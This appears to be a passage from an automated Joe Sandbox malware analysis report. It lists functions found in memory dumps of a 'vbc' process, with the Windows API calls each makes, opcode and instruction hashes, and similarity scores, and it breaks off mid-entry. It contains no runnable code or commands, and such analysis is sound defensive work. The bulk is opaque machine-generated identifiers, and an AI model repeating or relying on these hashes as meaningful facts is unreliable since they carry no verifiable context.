                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 0bb9241ba255442661085b627a2683d6a45d917fb6da949067e710135fd2fb34
                                                              • Instruction ID: 3c47022c812eefe8083437209d1bf01cc8fbdbded727aa9f9271cb09ff1692ea
                                                              • Opcode Fuzzy Hash: 0bb9241ba255442661085b627a2683d6a45d917fb6da949067e710135fd2fb34
                                                              • Instruction Fuzzy Hash: 3BB1CA7490A298CFCB66DF34E8886A9B7B2FF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7FD7 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: c001a993d04429354a9ec07c6656dcddb14a7e28ca394955f869078076d91901
                                                              • Instruction ID: 73542db0f45f79798c4556620f8fc569f5853af602bb01abfd321dc2909ed223
                                                              • Opcode Fuzzy Hash: c001a993d04429354a9ec07c6656dcddb14a7e28ca394955f869078076d91901
                                                              • Instruction Fuzzy Hash: 78B1DA7490A298CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE801C Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 5303f0b17ed0d40a9f689dafa8ab51004b3b460f4598759b8d27881fe1dd8819
                                                              • Instruction ID: 1d3196ef0b28371154165901178e497825266796d32ce0cfe58d2bb85e359689
                                                              • Opcode Fuzzy Hash: 5303f0b17ed0d40a9f689dafa8ab51004b3b460f4598759b8d27881fe1dd8819
                                                              • Instruction Fuzzy Hash: 56A1EA7490A298CFCB66DF34E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8061 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: ba2bdf1ea5dc0bce2de179c834d59d7ca799dde90af2e56156a3a33f51d3bd83
                                                              • Instruction ID: 9e785996a7048a09e109d696331365a017ec45fcc6b5d63433da602b31a05115
                                                              • Opcode Fuzzy Hash: ba2bdf1ea5dc0bce2de179c834d59d7ca799dde90af2e56156a3a33f51d3bd83
                                                              • Instruction Fuzzy Hash: C1A1EB7490A398CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE809D Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: eb083aae321c77b18ee3798daa344f27b39b8abb48c048692099207c9a4b1e0c
                                                              • Instruction ID: 4159764ebe122b52ded3688dc8caba0fa65f653ed2e89df9ad1619b3c9db8a03
                                                              • Opcode Fuzzy Hash: eb083aae321c77b18ee3798daa344f27b39b8abb48c048692099207c9a4b1e0c
                                                              • Instruction Fuzzy Hash: 7791EA7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE80E2 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: c344b183ffc5036deca35aaa944da5ec615f0284fd9ec0a224ad969f903a069a
                                                              • Instruction ID: da636824b82986ebd5b328fed4ef65a73244923fa662546c29d971b64d4f7e97
                                                              • Opcode Fuzzy Hash: c344b183ffc5036deca35aaa944da5ec615f0284fd9ec0a224ad969f903a069a
                                                              • Instruction Fuzzy Hash: DE91FA7490A298CFCB66DF34E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A3F3A60 Relevance: 1.7, APIs: 1, Instructions: 169libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.548516227.000000000A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a3f0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3578e99cc5c4ee51b20c7d2e7b768c0b91a9c74c4d3345eea400bb590d78fcb5
                                                              • Instruction ID: 42058042472cb023d9b6232596b55be1de2f4b098ef19e6e0d0d0a108be34f7f
                                                              • Opcode Fuzzy Hash: 3578e99cc5c4ee51b20c7d2e7b768c0b91a9c74c4d3345eea400bb590d78fcb5
                                                              • Instruction Fuzzy Hash: 4E51A030A112099FCB04EF74D945AAEBBF5EF85304F04896AE512DB391DF34E805CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8127 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: febf3a661bd83abc5ef339661d69b97157fa393700cf543a0f389a8fd46113ec
                                                              • Instruction ID: 97b5adb6a38b775750bd783e08a7a38a198cb34fa8416eebf13876913e035961
                                                              • Opcode Fuzzy Hash: febf3a661bd83abc5ef339661d69b97157fa393700cf543a0f389a8fd46113ec
                                                              • Instruction Fuzzy Hash: 0181DA7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE816C Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 96430f754b233d192d6baa40dccbe754645c4e3292202382b435c27c9e18ac39
                                                              • Instruction ID: d3267ab6aba437ba03119b1350a20ff9bcdca5006cbc2bd4a6d9ed7bfd9f79d0
                                                              • Opcode Fuzzy Hash: 96430f754b233d192d6baa40dccbe754645c4e3292202382b435c27c9e18ac39
                                                              • Instruction Fuzzy Hash: 9781DC7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE81B1 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: fc586f75e7ef1bfb599b5adbec3bc5a6f97d50ff3cd726a1924bbfa01faeb619
                                                              • Instruction ID: 11d94465556f7e58517aea6fe98e0c1794d1c27ba6565a6ed9ca35adb6aec64b
                                                              • Opcode Fuzzy Hash: fc586f75e7ef1bfb599b5adbec3bc5a6f97d50ff3cd726a1924bbfa01faeb619
                                                              • Instruction Fuzzy Hash: 6C81CB7490A268CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE81F9 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: cb3c22ac80a3ad184901eb8b8ac078c6a176902e30b6dee7683d769a0270c7ce
                                                              • Instruction ID: 3156272fa49386ed370026be87cf275c694db9a8b2899cab3f466114324046dc
                                                              • Opcode Fuzzy Hash: cb3c22ac80a3ad184901eb8b8ac078c6a176902e30b6dee7683d769a0270c7ce
                                                              • Instruction Fuzzy Hash: 5371F97490A268CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8241 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 3fa6bf165b71eb5a6117fc6c334d23a0da9f430adad64de1b47026648d34bbcd
                                                              • Instruction ID: 6005bb1df2dfcc732d1bc882aef1c43edbdaf27ddd0fa7266e7f1cee28957eee
                                                              • Opcode Fuzzy Hash: 3fa6bf165b71eb5a6117fc6c334d23a0da9f430adad64de1b47026648d34bbcd
                                                              • Instruction Fuzzy Hash: 3271C97490A268CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE4ED8 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 5b4c733a7878b89cdfe742ce046334ce3816d18b10e09c18f99c62f0caab4320
                                                              • Instruction ID: 06fbe93843fbc3654c830ddc463436c8e14b7219a9b1804573c1fa15923c2264
                                                              • Opcode Fuzzy Hash: 5b4c733a7878b89cdfe742ce046334ce3816d18b10e09c18f99c62f0caab4320
                                                              • Instruction Fuzzy Hash: 4B512370D002188FDB14CFA9D889BDDBBF1BF49318F15851AE816AB390DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE546D Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 5a12f52a1eb56e82ca84f5296579522217e64654dca85a88c0cfb3388289c866
                                                              • Instruction ID: bf5aa2940a1a4817bd60b31fb1824df79453f69118db50ceaa86bb1472b588d8
                                                              • Opcode Fuzzy Hash: 5a12f52a1eb56e82ca84f5296579522217e64654dca85a88c0cfb3388289c866
                                                              • Instruction Fuzzy Hash: 3B512270D002188FDB18CFA9D899BEDBBB2BF49318F158529E815AB350DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE4EE4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09EE55B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 0d871a5b3b9e11dd40bbc70034b5d5968fa54b3e47b1d647499102c254fca410
                                                              • Instruction ID: 668ec17fa583667279a5f98191cfd961b19b9f399bc7f931203d52311564efd6
                                                              • Opcode Fuzzy Hash: 0d871a5b3b9e11dd40bbc70034b5d5968fa54b3e47b1d647499102c254fca410
                                                              • Instruction Fuzzy Hash: F7511370D002188FDF14CFA9D889BDDBBB1BF48318F158519E815AB390DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8289 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: fb46221596f9d62264908653a5dedf69e95ee5e1c174e2350f8d4abbaa09dc9f
                                                              • Instruction ID: 3b4321a7cb0b85f3986d04a4d3c48602e3353420ccdf055808f572a2be84cf1e
                                                              • Opcode Fuzzy Hash: fb46221596f9d62264908653a5dedf69e95ee5e1c174e2350f8d4abbaa09dc9f
                                                              • Instruction Fuzzy Hash: 1961CA7490A268CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A2765D9 Relevance: 1.6, APIs: 1, Instructions: 127registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0A2766F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID:
                                                              • API String ID: 3660427363-0
                                                              • Opcode ID: 59fef0ea8766479f9e61eda4542511ca5d78700c636bc78ce15d4b97997fa7f2
                                                              • Instruction ID: 794edf22b6e8ead0ee335e0a1dd8d5253be7ebe42093e19240e6f43f6067eff8
                                                              • Opcode Fuzzy Hash: 59fef0ea8766479f9e61eda4542511ca5d78700c636bc78ce15d4b97997fa7f2
                                                              • Instruction Fuzzy Hash: AA4166B0D10258DFCB14CFA9C894A9EBFF5BF49304F19806AE819AB351D7349905CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE82D1 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 451bfd9400409ef979c0a7dc6ba43012497bbd5ddc1c178d7d7cbac4b42e30e7
                                                              • Instruction ID: 4b0fcbbe3567c716efecdd8eb3a6b00e2d09eedbd1a4d16165c0c90b7f7d59b9
                                                              • Opcode Fuzzy Hash: 451bfd9400409ef979c0a7dc6ba43012497bbd5ddc1c178d7d7cbac4b42e30e7
                                                              • Instruction Fuzzy Hash: EE51DA7490A268CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CF355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8319 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 040de4fc04cd0f4537a1fb12c876447e331b02e286d38f6afb0d4af78acc8ab3
                                                              • Instruction ID: 37492b2be03d5d39d0928904e4be6f8980b64b7d24d30af9fee77bb8108749b1
                                                              • Opcode Fuzzy Hash: 040de4fc04cd0f4537a1fb12c876447e331b02e286d38f6afb0d4af78acc8ab3
                                                              • Instruction Fuzzy Hash: 1E51EA74906268CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CF355E85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A276321 Relevance: 1.6, APIs: 1, Instructions: 116registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0A276434
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 7158aa378828520c3acc4c046a828be983be7d878f467b694938bcfb371b3d8a
                                                              • Instruction ID: ca21f90227be5b55719c98e69928b283c726ddf02f241037f70335efca49e152
                                                              • Opcode Fuzzy Hash: 7158aa378828520c3acc4c046a828be983be7d878f467b694938bcfb371b3d8a
                                                              • Instruction Fuzzy Hash: 7E417570D04289CFDB14CFA8C548A9EBBF1BF49304F29C06AE408AB391D7759945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8361 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 292acefd7cae0ed93604c9993177569f40c7dc93aed22a5f0df8cbfa92fb1587
                                                              • Instruction ID: 818f1a4efb49b0197d40100ad29ab5722050bec79aa736da09583eb09a055bb4
                                                              • Opcode Fuzzy Hash: 292acefd7cae0ed93604c9993177569f40c7dc93aed22a5f0df8cbfa92fb1587
                                                              • Instruction Fuzzy Hash: 2A51CA74906268CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CF355E85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE83A9 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: b030ccee21eec1a841b98d9d711b6fe31f52c3ff2c8ea3722e16006aa45c82b6
                                                              • Instruction ID: 4697fbcb2d3b1758a50369dfdf743e5e7f9b3252dea06aaeb9300d772c277155
                                                              • Opcode Fuzzy Hash: b030ccee21eec1a841b98d9d711b6fe31f52c3ff2c8ea3722e16006aa45c82b6
                                                              • Instruction Fuzzy Hash: B951CB74906258CFCB66DF74E888699B7B2BF4A34AF1041D9D40AA3740CF355E85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE83F1 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 8714f03e6a184eddafd7ccb0eb9b06b3d4cf2dee8f723fa373a8cf76047b6703
                                                              • Instruction ID: dd746e1edba04472cbcfbd19c8a798024a53816aa9053b6c5fc16c8f120d1215
                                                              • Opcode Fuzzy Hash: 8714f03e6a184eddafd7ccb0eb9b06b3d4cf2dee8f723fa373a8cf76047b6703
                                                              • Instruction Fuzzy Hash: 9141C974906268CFCB66DF74D8886A9B7B2BF4A34AF1041D9D40AA3740CF359E85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE677F Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(00000000), ref: 09EE6848
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: 7371ef74360651174af8369e7dc4575bb70d69c1d0392a71b8441d7d865fe28e
                                                              • Instruction ID: 58886ba57a5b26cce3adbce7113106e6ed97fa17a34a9012de2584ca36eede76
                                                              • Opcode Fuzzy Hash: 7371ef74360651174af8369e7dc4575bb70d69c1d0392a71b8441d7d865fe28e
                                                              • Instruction Fuzzy Hash: 2A310471D083858FCB01CF69C81479EBFF0AF49318F0584AAD444EB281D7389845CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04F0C8E4 Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 04F0C9BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: c4dfb5e2d62bc6c897ae5f03d32663afdfdcc87d5e11def58ebb74b3ab084bf8
                                                              • Instruction ID: 9d7c134632e923a9ef87dab5c10152ef9f9cafd48a4b203c1c82633266cdc4ea
                                                              • Opcode Fuzzy Hash: c4dfb5e2d62bc6c897ae5f03d32663afdfdcc87d5e11def58ebb74b3ab084bf8
                                                              • Instruction Fuzzy Hash: 0A3157B0D002899FDB18CFA8C88479EBFB1BB49314F14862DE855A7380D774A446CF96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8439 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 0da27a6f70fc81933cad049da6a2276b01ee965b45a1d7e7f83f78b6f4964a6e
                                                              • Instruction ID: 0a49460916e1379bd9ed7b7078a96208b85a6469eeef179eb61249ed7322ecb9
                                                              • Opcode Fuzzy Hash: 0da27a6f70fc81933cad049da6a2276b01ee965b45a1d7e7f83f78b6f4964a6e
                                                              • Instruction Fuzzy Hash: E141EA74906268CFCB66DF74E8886A9B7B2BF4634AF1041D9D40AA3740CF359D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04F09DC0 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 04F0C9BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: b0c4eadbb9316bc2ab70813be34797d4a2f2335ab3c217945b648193a953f553
                                                              • Instruction ID: a4ef2fa69e65eb55cc7fce75f759ea78bbf53a34ab786375ef819bbe77e812be
                                                              • Opcode Fuzzy Hash: b0c4eadbb9316bc2ab70813be34797d4a2f2335ab3c217945b648193a953f553
